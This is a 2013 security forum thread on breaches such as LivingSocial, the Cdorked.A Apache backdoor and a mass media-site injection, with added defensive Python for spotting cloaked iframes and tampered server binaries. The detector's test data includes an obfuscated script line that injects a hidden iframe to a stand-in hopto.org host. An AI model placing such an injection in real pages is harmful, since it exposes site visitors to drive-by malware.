News: Cexx forums, with volunteers dedicated to helping you remove malware and stay protected

Topic: Security breach/compromise - 2013
« Reply #15 on: April 29, 2013, 04:19:33 »
AplusWebMaster
FYI...

LivingSocial hacked - 50 million advised to change pwds...
- http://www.theregister.co.uk/2013/04/26/livingsocial_hacking_attack/
26 April 2013 - "Up to 50 million customers of the Amazon-funded daily deals site LivingSocial are getting an apologetic email from CEO Tim O'Shaughnessy explaining that their information may have been stolen. "LivingSocial recently experienced a cyber-attack on our computer systems that resulted in unauthorized access to some customer data from our servers. We are actively working with law enforcement to investigate this issue," he writes in an email... "The information accessed includes names, email addresses, date of birth for some users, and encrypted passwords – technically 'hashed' and 'salted' passwords. We never store passwords in plain text." At this stage, the company is saying that all credit card details for customers, and the financial accounts of operators that LivingSocial does deals with, are stored on a separate database and that this hasn't been hacked. Users are being asked to change their passwords and to ignore any emails claiming to be from LivingSocial that ask for financial information. Although the email doesn’t mention it, if your LivingSocial password was used for any other online accounts, then you'd be advised to change those, too..."

Also see:
- https://www.net-security.org/secworld.php?id=14833
29 April 2013
- http://h-online.com/-1851667
29 April 2013
___

Apache systems using cPanel compromised
- http://h-online.com/-1851442
29 April 2013 - "Researchers at web security firm Sucuri* have discovered modified binaries in the open source Apache web server. The binaries will load malicious code or other web content without any user interaction. Only files that were installed using the cPanel administration tool are currently thought to be affected. ESET says** that several hundred web servers have been compromised. The attack has been named Linux/Cdorked.A and is difficult to detect..."
* http://blog.sucuri.net/2013/04/apache-binary-backdoors-on-cpanel-based-servers.html
April 26, 2013
** http://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/
April 26, 2013
- https://www.net-security.org/secworld.php?id=14836
29 April 2013

Apache binary backdoor adds malicious redirect to Blackhole
- https://isc.sans.edu/diary.html?storyid=15710
Last Updated: 2013-04-30

> https://www.virustotal.com/en/file/7b3cd8c1bd0249df458084f28d91648ad14e1baf455fdd53b174481d540070c6/analysis/
File name: cdorked.a.httpd
Detection ratio: 13/44
Analysis date:    2013-04-30

« Reply #16 on: May 07, 2013, 06:11:44 »
AplusWebMaster
FYI...

Media sites - mass compromise
- http://research.zscaler.com/2013/05/popular-media-sites-involved-in-mass.html
May 6, 2013 - "... Zscaler identified yet another mass website compromise, this one impacting a number of popular media sites, including two radio stations in Washington, DC - Federal News Radio and WTOP. It's not clear if all of the sites impacted were leveraging a common backend platform that may have led to the compromise... Attacks targeting end users generally involve some form of social engineering whereby the potential victim must be convinced to visit a site, download a file, etc. Attackers will therefore write a script designed to comb the web looking for popular sites exposing a common flaw and when identified, inject a single line of malicious code into the sites. In that way, any user visiting the otherwise legitimate (but now infected) site, can become a victim. This particular threat also displays another common trait - being dynamic in nature and only delivering content if the victim browser exhibits certain attributes. In this case, the injected content is only displayed when the browser's User Agent string reveals that Internet Explorer (IE) is being used... obfuscated JavaScript decodes to reveal an iFrame pointing to sites hosted at Dynamic DNS (DynDNS) hosting providers. Thus far, we have identified two DynDNS providers (myftp .biz and hopto .org) involved... Thus far, Zscaler has identified the following compromised sites:
Media Sites:
    WTOP Radio (Washington, DC) - wtop .com
    Federal News Radio (Washington, DC) - federalnewsradio .com
    The Christian Post - christianpost .com
    Real Clear Science - realclearscience .com
    Real Clear Policy - realclearpolicy .com
Others:
    scubaboard .com
    mrsec .com
    menupix .com
    xaxor .com
    gvovideo .com
At the time of posting, these compromised sites were still offering up malicious content."
___

- https://www.net-security.org/malware_news.php?id=2485
May 7, 2013 - "... This particular mass compromise is targeting only Internet Explorer users, probably because the attackers are using exploits only for that particular software. Users who surf to the sites using any other browser don't trigger the redirection chain..."
___

The Onion/Twitter compromise...
- http://h-online.com/-1859850
9 May 2013

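The Zscaler write-up quoted above describes the injection as one line of obfuscated JavaScript, served only to Internet Explorer user agents, that decodes to an iframe on a dynamic DNS host (myftp.biz and hopto.org are the two providers it names). The following is an added example for site owners checking their own pages, not code from Zscaler or from the forum post: it undoes the two common encodings (`unescape("%3C...")` and `String.fromCharCode(...)`), pulls iframe targets out of both literal markup and decoded script, flags those under a dynamic DNS suffix, and compares an IE-fetched copy of a page with a copy fetched under another user agent so cloaked injections stand out. The sample pages, the hostname `update-check.hopto.org` and the suffix list are constructed for the example; the fetching itself is left to the caller.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

# Dynamic DNS suffixes named in the Zscaler report quoted above (myftp.biz,
# hopto.org). Extend with your own list; this tuple is an example value.
DYNDNS_SUFFIXES = ("myftp.biz", "hopto.org")

_UNESCAPE_RE = re.compile(r'unescape\(\s*(["\'])(.*?)\1\s*\)', re.S)
_FROMCHARCODE_RE = re.compile(r'String\.fromCharCode\(\s*([\d\s,]+)\)')
_IFRAME_SRC_RE = re.compile(r'<iframe[^>]*\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)


def deobfuscate(script: str) -> str:
    """Undo two encodings commonly used to hide injected markup:
    unescape("%3Ciframe...") and String.fromCharCode(60,105,...).
    Anything else is returned unchanged."""
    out = _UNESCAPE_RE.sub(lambda m: unquote(m.group(2)), script)
    out = _FROMCHARCODE_RE.sub(
        lambda m: "".join(chr(int(c)) for c in m.group(1).split(",") if c.strip()),
        out)
    return out


class _Collector(HTMLParser):
    """Collect literal <iframe src> values and inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.iframes = []
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            src = dict(attrs).get("src")
            if src:
                self.iframes.append(src)
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # script bodies arrive here verbatim (HTMLParser treats them as CDATA)
        if self._in_script:
            self.scripts.append(data)


def _host(url: str) -> str:
    return (urlsplit(url).hostname or "").lower()


def is_dyndns(host: str) -> bool:
    return any(host == s or host.endswith("." + s) for s in DYNDNS_SUFFIXES)


def suspicious_iframes(html: str) -> list:
    """Return iframe src URLs whose host sits under a dynamic DNS suffix,
    whether the iframe is literal markup or hidden inside obfuscated script."""
    c = _Collector()
    c.feed(html)
    candidates = list(c.iframes)
    for body in c.scripts:
        candidates += _IFRAME_SRC_RE.findall(deobfuscate(body))
    return sorted({u for u in candidates if is_dyndns(_host(u))})


def cloaked_injection(html_ie: str, html_other: str) -> list:
    """Fetch the same URL twice outside this function (once with an IE
    User-Agent, once with another) and report iframes present only in the
    IE copy; that is the cloaking behaviour the report describes."""
    return sorted(set(suspicious_iframes(html_ie)) - set(suspicious_iframes(html_other)))


# Constructed sample pages (not real captures). The IE variant carries one
# injected line that decodes to a 1x1 iframe on a DynDNS host.
PAGE_OTHER = ("<html><body><h1>Station news</h1>"
              "<iframe src='https://player.example.com/embed'></iframe></body></html>")
_INJECTED = ("<script>document.write(unescape('%3Ciframe src=%22http://update-check.hopto.org/in.php%22 "
             "width=1 height=1%3E%3C/iframe%3E'))</script>")
PAGE_IE = PAGE_OTHER.replace("</body>", _INJECTED + "</body>")

if __name__ == "__main__":
    for url in cloaked_injection(PAGE_IE, PAGE_OTHER):
        print("cloaked iframe served only to IE:", url)
```

The two-fetch comparison is the part that matters operationally: a single crawl with a non-IE user agent would return the clean page and miss the injection entirely, which is exactly why the compromised sites stayed live.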
« Reply #17 on: May 09, 2013, 13:41:22 »
AplusWebMaster
FYI...

Name.com hacked...
- https://www.computerworld.com/s/article/9239050/Name.com_forces_customers_to_reset_passwords_following_security_breach
May 9, 2013 - "Domain registrar Name.com forced its customers to reset their account passwords on Wednesday following a security breach on the company's servers that might have resulted in customer information being compromised. Hackers might have gained access to usernames, email addresses, encrypted passwords as well as encrypted credit card information, the company said in an email message sent to customers that was later posted online by users. The credit card information was encrypted with private keys stored in a separate location that wasn't compromised, Name.com said in the email. The company did not specify the type of encryption used, but referred to it as being "strong." The alert email instructed recipients to click on a link in order to perform a password reset, a method that was criticized by some users and security researchers, because it resembles that used in phishing attacks... A hacker group called Hack the Planet (HTP) claimed earlier this week that they compromised Name.com in their attempt to hack into Linode, a virtual private server hosting firm. In a recently published "hacker zine," HTP said that they managed to acquire the domain login for Linode, as well as for Stack Overflow, DeviantArt and others from Name.com. Name.com did not immediately respond to an inquiry seeking confirmation of HTP's claims and other information about the attack..."

- http://www.welivesecurity.com/2013/05/09/name-com-warns-customers-and-resets-passwords-after-breach/
9 May 2013

« Reply #18 on: May 10, 2013, 02:15:23 »
AplusWebMaster
FYI...

Cdorked.A malware redirection spreads ...
- https://atlas.arbor.net/briefs/index#-69874705
May 09, 2013 - "The previously reported Cdorked / Darkleech attack campaign, previously observed affecting Apache servers, has been observed to infect other webservers. The attack has been associated with the delivery of malware.
Analysis: Nginx and Lighttpd have also been seen to be infected as part of this campaign. Original exploitation vectors are not yet well known but past experience suggests that weak passwords and vulnerable web applications could be likely vectors.
ESET offer a tool to detect in-memory traces of this malware - please see: http://www.welivesecurity.com/wp-content/uploads/2013/04/dump_cdorked_config.c
Source: http://www.theregister.co.uk/2013/05/08/cdorked_latest_details/

- http://www.welivesecurity.com/2013/05/07/linuxcdorked-malware-lighttpd-and-nginx-web-servers-also-affected/
7 May 2013 - "... We have observed more than 400 webservers infected with Linux/Cdorked.A. Out of these, 50 are ranked in Alexa’s top 100,000 most popular websites... In a typical attack scenario, victims are redirected to a malicious web server hosting a Blackhole exploit kit. We have discovered that this malicious infrastructure uses compromised DNS servers, something that is out of the ordinary... one point needs to be clear about Linux/Cdorked.A. We still don’t know for sure how this malicious software was deployed on the web servers. We believe the infection vector is not unique. It cannot be attributed solely to installations of cPanel because only a fraction of the infected servers are using this management software. One thing is clear, this malware does not propagate by itself and it does not exploit a vulnerability in a specific software. Linux/Cdorked.A is a backdoor, used by the malicious actor to serve malicious content from legitimate websites... we recommend keeping browsers, browser extensions, operating systems, and third party software like Java, PDF readers and Flash players fully up-to-date to avoid being infected by this on-going campaign. Use of an antivirus program is also recommended..."

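Both Cdorked.A posts in this thread (Reply #15 and the one above) come down to the same defensive point: the backdoor is a replaced web server binary (httpd, and later nginx and lighttpd), so the first thing an administrator can do is compare the binaries on disk against a known-good baseline and against the published sample hash. The script below is an added example, not ESET's dump_cdorked_config.c tool and not code from any of the linked articles. It records a baseline of hashes right after a clean install, later reports binaries that are modified, missing, unexpected, or that match a known-bad SHA256 (the one listed is the cdorked.a.httpd hash from the VirusTotal link in Reply #15). The default binary paths are assumptions to adjust for your build; `demo()` runs the whole flow on constructed files in a temporary directory.

```python
import hashlib
import os
import tempfile
from pathlib import Path

# SHA256 of the cdorked.a.httpd sample from the VirusTotal link quoted in Reply #15.
KNOWN_BAD_SHA256 = {
    "7b3cd8c1bd0249df458084f28d91648ad14e1baf455fdd53b174481d540070c6": "Linux/Cdorked.A (cdorked.a.httpd)",
}

# Binaries named in the ESET/Arbor reports. These paths are assumptions; adjust
# them to where your cPanel or distribution build actually installs them.
DEFAULT_TARGETS = [
    "/usr/local/apache/bin/httpd",
    "/usr/sbin/httpd",
    "/usr/sbin/nginx",
    "/usr/sbin/lighttpd",
]


def sha256_file(path) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(paths) -> dict:
    """Record hash, size and mtime of each existing path. Run this right after
    a clean install (or after verifying the binary against vendor packages)
    and store the result somewhere the web server's account cannot write."""
    base = {}
    for p in paths:
        p = str(p)
        if os.path.isfile(p):
            st = os.stat(p)
            base[p] = {"sha256": sha256_file(p), "size": st.st_size, "mtime": int(st.st_mtime)}
    return base


def check(paths, baseline) -> list:
    """Return (path, verdict, detail) tuples; verdict is one of
    KNOWN_BAD, MODIFIED, NEW, MISSING, OK."""
    findings = []
    for p in paths:
        p = str(p)
        if not os.path.isfile(p):
            if p in baseline:
                findings.append((p, "MISSING", "in baseline but absent on disk"))
            continue
        digest = sha256_file(p)
        if digest in KNOWN_BAD_SHA256:
            findings.append((p, "KNOWN_BAD", KNOWN_BAD_SHA256[digest]))
        elif p not in baseline:
            findings.append((p, "NEW", digest))
        elif baseline[p]["sha256"] != digest:
            findings.append((p, "MODIFIED", f"baseline {baseline[p]['sha256'][:12]}... now {digest[:12]}..."))
        else:
            findings.append((p, "OK", digest))
    return findings


def demo() -> dict:
    """Walk-through on constructed files (not real binaries) in a temp dir:
    baseline two clean files, then tamper with one, delete one, add one."""
    with tempfile.TemporaryDirectory() as d:
        httpd, nginx, extra = (Path(d) / n for n in ("httpd", "nginx", "lighttpd"))
        httpd.write_bytes(b"clean httpd build")
        nginx.write_bytes(b"clean nginx build")
        baseline = build_baseline([httpd, nginx])
        before = {Path(p).name: v for p, v, _ in check([httpd, nginx], baseline)}
        httpd.write_bytes(b"clean httpd build\x00injected")   # simulated tampering
        nginx.unlink()                                        # simulated removal
        extra.write_bytes(b"unexpected")                      # simulated unknown binary
        after = {Path(p).name: v for p, v, _ in check([httpd, nginx, extra], baseline)}
    return {"before": before, "after": after}


if __name__ == "__main__":
    print(demo())
    # On a real host: baseline = build_baseline(DEFAULT_TARGETS), persist it read-only,
    # then periodically review check(DEFAULT_TARGETS, baseline) for anything but OK.
```

A clean hash comparison only covers the file on disk; the ESET write-up points out that the backdoor keeps its configuration in memory, which is why ESET's tool examines in-memory traces rather than the binary. Treat this check as the on-disk half of the verification, and keep the baseline file and the checker itself outside the web server's write reach, since a replaced binary could otherwise cover its tracks.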